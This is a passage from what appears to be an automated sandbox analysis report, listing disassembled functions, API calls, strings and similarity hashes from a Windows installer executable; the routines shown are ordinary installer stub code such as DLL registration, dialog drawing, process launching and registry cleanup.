                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                  • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                  • Ht, xrefs: 00402473
                                                                                                                                                                                  • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                  • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$Ht
                                                                                                                                                                                  • API String ID: 1033533793-3079458245
                                                                                                                                                                                  • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                                                                  • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                                                                                                                  • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                                                                                                                  Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                                                                                                                  • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                                                                                                                  • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                                                                                                                  • GetSysColor.USER32(?), ref: 00403E2B
                                                                                                                                                                                  • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00403E55
                                                                                                                                                                                  • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2320649405-0
                                                                                                                                                                                  • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                                                                  • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                                                                                                                                  • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                                                                                                                                  Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                    • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                    • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                    • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                    • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                    • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                    • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                                                    • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Exec: success ("%s"), xrefs: 00402263
                                                                                                                                                                                  • Exec: command="%s", xrefs: 00402241
                                                                                                                                                                                  • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                                                                                                                  • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                                                                                                                  • API String ID: 2014279497-3433828417
                                                                                                                                                                                  • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                                                                  • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                                                                                                                  Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                                                                                                                  • GetMessagePos.USER32 ref: 00404871
                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                                                                                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Message$Send$ClientScreen
                                                                                                                                                                                  • String ID: f
                                                                                                                                                                                  • API String ID: 41195575-1993550816
                                                                                                                                                                                  • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                                                                                                  • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                                                                                                                                  • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                                                                                                                  • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                                                                                                                                  Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                  • MulDiv.KERNEL32(00017A00,00000064,?), ref: 00403295
                                                                                                                                                                                  • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                  • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                  • String ID: verifying installer: %d%%
                                                                                                                                                                                  • API String ID: 1451636040-82062127
                                                                                                                                                                                  • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                                                                                                  • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                                                                                                                  • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                                                                                                                                  Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                                                                                                                  • wsprintfW.USER32 ref: 00404457
                                                                                                                                                                                  • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                  • String ID: %u.%u%s%s$@rD
                                                                                                                                                                                  • API String ID: 3540041739-1813061909
                                                                                                                                                                                  • Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                                                                                                                                  • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                                                                                                                                  • Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
                                                                                                                                                                                  • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                                                                                                                                  Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                                                                                                                                  • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                                                                                                                                  • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                                                                                                                                  • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Char$Next$Prev
                                                                                                                                                                                  • String ID: *?|<>/":
                                                                                                                                                                                  • API String ID: 589700163-165019052
                                                                                                                                                                                  • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                                                                  • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                                                                                                                                  • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                                                                                                                                  • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                                                                                                                                  Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1912718029-0
                                                                                                                                                                                  • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                                                                  • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                                                                                                                                  • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                                                                                                                                  Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                  • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                  • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031379486.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000041F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.000000000042B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.0000000000461000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004B3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031436335.00000000004BF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031803918.00000000004F4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_C3F.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1849352358-0
                                                                                                                                                                                  • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                                                                  • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
                                                                                                                                                                                  Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000000E.00000002.4031328330.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 0000000E.00000002.4031113707.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
